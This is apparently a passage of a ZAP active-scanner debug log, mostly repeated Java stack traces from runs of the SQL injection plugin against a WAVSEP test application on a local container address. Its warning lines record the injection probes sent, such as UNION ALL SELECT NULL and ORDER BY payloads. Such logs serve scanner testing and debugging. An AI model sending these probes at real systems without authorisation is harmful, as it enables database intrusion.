org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682249 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682250 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682250 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682251 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682253 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682253 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682254 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682255 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 2403-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 2403-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682255 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682256 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682257 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682257 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at 